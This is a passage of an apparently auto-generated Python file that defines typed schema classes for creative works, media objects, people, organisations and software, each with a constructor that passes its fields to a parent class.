"""A created collection of CreativeWorks or other artefacts."""
parts: Array["CreativeWorkTypes"]
def __init__(
self,
parts: Array["CreativeWorkTypes"],
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
parts=parts,
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if parts is not None:
self.parts = parts
class Datatable(CreativeWork):
"""A table of data."""
columns: Array["DatatableColumn"]
def __init__(
self,
columns: Array["DatatableColumn"],
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if columns is not None:
self.columns = columns
class MediaObject(CreativeWork):
"""
A media object, such as an image, video, or audio object embedded in a web
page or a downloadable dataset.
"""
contentUrl: str
bitrate: Optional[float] = None
contentSize: Optional[float] = None
embedUrl: Optional[str] = None
format: Optional[str] = None
def __init__(
self,
contentUrl: str,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
bitrate: Optional[float] = None,
content: Optional[Array["Node"]] = None,
contentSize: Optional[float] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
embedUrl: Optional[str] = None,
format: Optional[str] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if contentUrl is not None:
self.contentUrl = contentUrl
if bitrate is not None:
self.bitrate = bitrate
if contentSize is not None:
self.contentSize = contentSize
if embedUrl is not None:
self.embedUrl = embedUrl
if format is not None:
self.format = format
class AudioObject(MediaObject):
"""An audio file"""
caption: Optional[str] = None
transcript: Optional[str] = None
def __init__(
self,
contentUrl: str,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
bitrate: Optional[float] = None,
caption: Optional[str] = None,
content: Optional[Array["Node"]] = None,
contentSize: Optional[float] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
embedUrl: Optional[str] = None,
format: Optional[str] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
transcript: Optional[str] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
contentUrl=contentUrl,
alternateNames=alternateNames,
authors=authors,
bitrate=bitrate,
content=content,
contentSize=contentSize,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
embedUrl=embedUrl,
format=format,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if caption is not None:
self.caption = caption
if transcript is not None:
self.transcript = transcript
class DatatableColumn(Thing):
"""A column of data within a Datatable."""
name: str
values: Array[Any]
schema: Optional["ArraySchema"] = None
def __init__(
self,
name: str,
values: Array[Any],
alternateNames: Optional[Array[str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
schema: Optional["ArraySchema"] = None,
url: Optional[str] = None
) -> None:
super().__init__(
name=name,
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
url=url
)
if name is not None:
self.name = name
if values is not None:
self.values = values
if schema is not None:
self.schema = schema
class EnumSchema(Entity):
"""A schema specifying that a node must be one of several values."""
values: Optional[Array["Node"]] = None
def __init__(
self,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
values: Optional[Array["Node"]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if values is not None:
self.values = values
class Environment(Thing):
"""A computational environment."""
name: str
adds: Optional[Array["SoftwareSourceCode"]] = None
extends: Optional[Array["Environment"]] = None
removes: Optional[Array["SoftwareSourceCode"]] = None
def __init__(
self,
name: str,
adds: Optional[Array["SoftwareSourceCode"]] = None,
alternateNames: Optional[Array[str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
extends: Optional[Array["Environment"]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
removes: Optional[Array["SoftwareSourceCode"]] = None,
url: Optional[str] = None
) -> None:
super().__init__(
name=name,
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
url=url
)
if name is not None:
self.name = name
if adds is not None:
self.adds = adds
if extends is not None:
self.extends = extends
if removes is not None:
self.removes = removes
class Figure(CreativeWork):
"""
Encapsulates one or more images, videos, tables, etc, and provides captions
and labels for them.
"""
caption: Optional[Array["Node"]] = None
label: Optional[str] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
caption: Optional[Array["Node"]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
label: Optional[str] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if caption is not None:
self.caption = caption
if label is not None:
self.label = label
class Function(Entity):
"""
A function with a name, which might take Parameters and return a value of a
certain type.
"""
name: str
parameters: Optional[Array["Parameter"]] = None
returns: Optional["SchemaTypes"] = None
def __init__(
self,
name: str,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
parameters: Optional[Array["Parameter"]] = None,
returns: Optional["SchemaTypes"] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if name is not None:
self.name = name
if parameters is not None:
self.parameters = parameters
if returns is not None:
self.returns = returns
class Heading(Entity):
"""Heading"""
content: Array["InlineContent"]
depth: float
def __init__(
self,
content: Array["InlineContent"],
depth: float,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if content is not None:
self.content = content
if depth is not None:
self.depth = depth
class ImageObject(MediaObject):
"""An image file."""
caption: Optional[str] = None
thumbnail: Optional["ImageObject"] = None
def __init__(
self,
contentUrl: str,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
bitrate: Optional[float] = None,
caption: Optional[str] = None,
content: Optional[Array["Node"]] = None,
contentSize: Optional[float] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
embedUrl: Optional[str] = None,
format: Optional[str] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
thumbnail: Optional["ImageObject"] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
contentUrl=contentUrl,
alternateNames=alternateNames,
authors=authors,
bitrate=bitrate,
content=content,
contentSize=contentSize,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
embedUrl=embedUrl,
format=format,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if caption is not None:
self.caption = caption
if thumbnail is not None:
self.thumbnail = thumbnail
class Include(Entity):
"""
A directive to include content from an external source (e.g. file, URL) or
content.
"""
source: str
content: Optional[Array["Node"]] = None
hash: Optional[str] = None
mediaType: Optional[str] = None
def __init__(
self,
source: str,
content: Optional[Array["Node"]] = None,
hash: Optional[str] = None,
id: Optional[str] = None,
mediaType: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if source is not None:
self.source = source
if content is not None:
self.content = content
if hash is not None:
self.hash = hash
if mediaType is not None:
self.mediaType = mediaType
class NumberSchema(Entity):
"""A schema specifying the constraints on a numeric node."""
exclusiveMaximum: Optional[float] = None
exclusiveMinimum: Optional[float] = None
maximum: Optional[float] = None
minimum: Optional[float] = None
multipleOf: Optional[float] = None
def __init__(
self,
exclusiveMaximum: Optional[float] = None,
exclusiveMinimum: Optional[float] = None,
id: Optional[str] = None,
maximum: Optional[float] = None,
meta: Optional[Dict[str, Any]] = None,
minimum: Optional[float] = None,
multipleOf: Optional[float] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if exclusiveMaximum is not None:
self.exclusiveMaximum = exclusiveMaximum
if exclusiveMinimum is not None:
self.exclusiveMinimum = exclusiveMinimum
if maximum is not None:
self.maximum = maximum
if minimum is not None:
self.minimum = minimum
if multipleOf is not None:
self.multipleOf = multipleOf
class IntegerSchema(NumberSchema):
"""A schema specifying the constraints on an integer node."""
def __init__(
self,
exclusiveMaximum: Optional[float] = None,
exclusiveMinimum: Optional[float] = None,
id: Optional[str] = None,
maximum: Optional[float] = None,
meta: Optional[Dict[str, Any]] = None,
minimum: Optional[float] = None,
multipleOf: Optional[float] = None
) -> None:
super().__init__(
exclusiveMaximum=exclusiveMaximum,
exclusiveMinimum=exclusiveMinimum,
id=id,
maximum=maximum,
meta=meta,
minimum=minimum,
multipleOf=multipleOf
)
class Link(Entity):
"""
A hyperlink to other pages, sections within the same document, resources,
or any URL.
"""
content: Array["InlineContent"]
target: str
relation: Optional[str] = None
title: Optional[str] = None
def __init__(
self,
content: Array["InlineContent"],
target: str,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
relation: Optional[str] = None,
title: Optional[str] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if content is not None:
self.content = content
if target is not None:
self.target = target
if relation is not None:
self.relation = relation
if title is not None:
self.title = title
class List(Entity):
"""A list of items."""
items: Array["ListItem"]
order: Optional["EItemListOrder"] = None
def __init__(
self,
items: Array["ListItem"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
order: Optional["EItemListOrder"] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if items is not None:
self.items = items
if order is not None:
self.order = order
class ListItem(Entity):
"""A single item in a list."""
content: Array["Node"]
checked: Optional[bool] = None
def __init__(
self,
content: Array["Node"],
checked: Optional[bool] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if content is not None:
self.content = content
if checked is not None:
self.checked = checked
class Mount(Thing):
"""Describes a volume mount from a host to container."""
mountDestination: str
mountOptions: Optional[Array[str]] = None
mountSource: Optional[str] = None
mountType: Optional[str] = None
def __init__(
self,
mountDestination: str,
alternateNames: Optional[Array[str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
mountOptions: Optional[Array[str]] = None,
mountSource: Optional[str] = None,
mountType: Optional[str] = None,
name: Optional[str] = None,
url: Optional[str] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
name=name,
url=url
)
if mountDestination is not None:
self.mountDestination = mountDestination
if mountOptions is not None:
self.mountOptions = mountOptions
if mountSource is not None:
self.mountSource = mountSource
if mountType is not None:
self.mountType = mountType
class Organization(Thing):
"""An organization such as a school, NGO, corporation, club, etc."""
address: Optional[str] = None
brands: Optional[Array["Brand"]] = None
contactPoints: Optional[Array["ContactPoint"]] = None
departments: Optional[Array["Organization"]] = None
funders: Optional[Array[Union["Organization", "Person"]]] = None
legalName: Optional[str] = None
parentOrganization: Optional["Organization"] = None
def __init__(
self,
address: Optional[str] = None,
alternateNames: Optional[Array[str]] = None,
brands: Optional[Array["Brand"]] = None,
contactPoints: Optional[Array["ContactPoint"]] = None,
departments: Optional[Array["Organization"]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
funders: Optional[Array[Union["Organization", "Person"]]] = None,
id: Optional[str] = None,
legalName: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parentOrganization: Optional["Organization"] = None,
url: Optional[str] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
name=name,
url=url
)
if address is not None:
self.address = address
if brands is not None:
self.brands = brands
if contactPoints is not None:
self.contactPoints = contactPoints
if departments is not None:
self.departments = departments
if funders is not None:
self.funders = funders
if legalName is not None:
self.legalName = legalName
if parentOrganization is not None:
self.parentOrganization = parentOrganization
class Paragraph(Entity):
"""Paragraph"""
content: Array["InlineContent"]
def __init__(
self,
content: Array["InlineContent"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if content is not None:
self.content = content
class Variable(Entity):
"""A variable that can be set and used in code."""
name: str
default: Optional["Node"] = None
required: Optional[bool] = None
schema: Optional["SchemaTypes"] = None
def __init__(
self,
name: str,
default: Optional["Node"] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
required: Optional[bool] = None,
schema: Optional["SchemaTypes"] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if name is not None:
self.name = name
if default is not None:
self.default = default
if required is not None:
self.required = required
if schema is not None:
self.schema = schema
class Parameter(Variable):
"""A parameter that can be set and used in evaluated code."""
default: Optional["Node"] = None
extends: Optional[bool] = None
repeats: Optional[bool] = None
required: Optional[bool] = None
def __init__(
self,
name: str,
default: Optional["Node"] = None,
extends: Optional[bool] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
repeats: Optional[bool] = None,
required: Optional[bool] = None,
schema: Optional["SchemaTypes"] = None
) -> None:
super().__init__(
name=name,
id=id,
meta=meta,
schema=schema
)
if default is not None:
self.default = default
if extends is not None:
self.extends = extends
if repeats is not None:
self.repeats = repeats
if required is not None:
self.required = required
class Periodical(CreativeWork):
"""A periodical publication."""
dateEnd: Optional[Union["Date", str]] = None
dateStart: Optional[Union["Date", str]] = None
issn: Optional[Array[str]] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateEnd: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
dateStart: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
issn: Optional[Array[str]] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if dateEnd is not None:
self.dateEnd = dateEnd
if dateStart is not None:
self.dateStart = dateStart
if issn is not None:
self.issn = issn
class Person(Thing):
"""A person (alive, dead, undead, or fictional)."""
address: Optional[str] = None
affiliations: Optional[Array["Organization"]] = None
emails: Optional[Array[str]] = None
familyNames: Optional[Array[str]] = None
funders: Optional[Array[Union["Organization", "Person"]]] = None
givenNames: Optional[Array[str]] = None
honorificPrefix: Optional[str] = None
honorificSuffix: Optional[str] = None
jobTitle: Optional[str] = None
memberOf: Optional[Array["Organization"]] = None
telephoneNumbers: Optional[Array[str]] = None
def __init__(
self,
address: Optional[str] = None,
affiliations: Optional[Array["Organization"]] = None,
alternateNames: Optional[Array[str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
emails: Optional[Array[str]] = None,
familyNames: Optional[Array[str]] = None,
funders: Optional[Array[Union["Organization", "Person"]]] = None,
givenNames: Optional[Array[str]] = None,
honorificPrefix: Optional[str] = None,
honorificSuffix: Optional[str] = None,
id: Optional[str] = None,
jobTitle: Optional[str] = None,
memberOf: Optional[Array["Organization"]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
telephoneNumbers: Optional[Array[str]] = None,
url: Optional[str] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
name=name,
url=url
)
if address is not None:
self.address = address
if affiliations is not None:
self.affiliations = affiliations
if emails is not None:
self.emails = emails
if familyNames is not None:
self.familyNames = familyNames
if funders is not None:
self.funders = funders
if givenNames is not None:
self.givenNames = givenNames
if honorificPrefix is not None:
self.honorificPrefix = honorificPrefix
if honorificSuffix is not None:
self.honorificSuffix = honorificSuffix
if jobTitle is not None:
self.jobTitle = jobTitle
if memberOf is not None:
self.memberOf = memberOf
if telephoneNumbers is not None:
self.telephoneNumbers = telephoneNumbers
class Product(Thing):
"""
Any offered product or service. For example, a pair of shoes; a haircut; or
an episode of a TV show streamed online.
"""
brands: Optional[Array["Brand"]] = None
logo: Optional[Union[str, "ImageObject"]] = None
productID: Optional[str] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
brands: Optional[Array["Brand"]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
id: Optional[str] = None,
logo: Optional[Union[str, "ImageObject"]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
productID: Optional[str] = None,
url: Optional[str] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
name=name,
url=url
)
if brands is not None:
self.brands = brands
if logo is not None:
self.logo = logo
if productID is not None:
self.productID = productID
class PublicationIssue(CreativeWork):
"""
A part of a successively published publication such as a periodical or
publication volume, often numbered.
"""
issueNumber: Optional[Union[str, int]] = None
pageEnd: Optional[Union[str, int]] = None
pageStart: Optional[Union[str, int]] = None
pagination: Optional[str] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
issueNumber: Optional[Union[str, int]] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
pageEnd: Optional[Union[str, int]] = None,
pageStart: Optional[Union[str, int]] = None,
pagination: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if issueNumber is not None:
self.issueNumber = issueNumber
if pageEnd is not None:
self.pageEnd = pageEnd
if pageStart is not None:
self.pageStart = pageStart
if pagination is not None:
self.pagination = pagination
class PublicationVolume(CreativeWork):
"""
A part of a successively published publication such as a periodical or
multi-volume work.
"""
pageEnd: Optional[Union[str, int]] = None
pageStart: Optional[Union[str, int]] = None
pagination: Optional[str] = None
volumeNumber: Optional[Union[str, int]] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
pageEnd: Optional[Union[str, int]] = None,
pageStart: Optional[Union[str, int]] = None,
pagination: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None,
volumeNumber: Optional[Union[str, int]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if pageEnd is not None:
self.pageEnd = pageEnd
if pageStart is not None:
self.pageStart = pageStart
if pagination is not None:
self.pagination = pagination
if volumeNumber is not None:
self.volumeNumber = volumeNumber
class Quote(Mark):
"""Inline, quoted content."""
cite: Optional[Union["Cite", str]] = None
def __init__(
self,
content: Array["InlineContent"],
cite: Optional[Union["Cite", str]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
content=content,
id=id,
meta=meta
)
if cite is not None:
self.cite = cite
class QuoteBlock(Entity):
"""A section quoted from somewhere else."""
content: Array["BlockContent"]
cite: Optional[Union["Cite", str]] = None
def __init__(
self,
content: Array["BlockContent"],
cite: Optional[Union["Cite", str]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if content is not None:
self.content = content
if cite is not None:
self.cite = cite
class ResourceParameters(Thing):
"""
Describes limits or requested amounts for a particular resource (e.g.
memory or CPU).
"""
resourceLimit: Optional[float] = None
resourceRequested: Optional[float] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
resourceLimit: Optional[float] = None,
resourceRequested: Optional[float] = None,
url: Optional[str] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
name=name,
url=url
)
if resourceLimit is not None:
self.resourceLimit = resourceLimit
if resourceRequested is not None:
self.resourceRequested = resourceRequested
class SoftwareApplication(CreativeWork):
"""A software application."""
softwareRequirements: Optional[Array["SoftwareApplication"]] = None
softwareVersion: Optional[str] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
softwareRequirements: Optional[Array["SoftwareApplication"]] = None,
softwareVersion: Optional[str] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
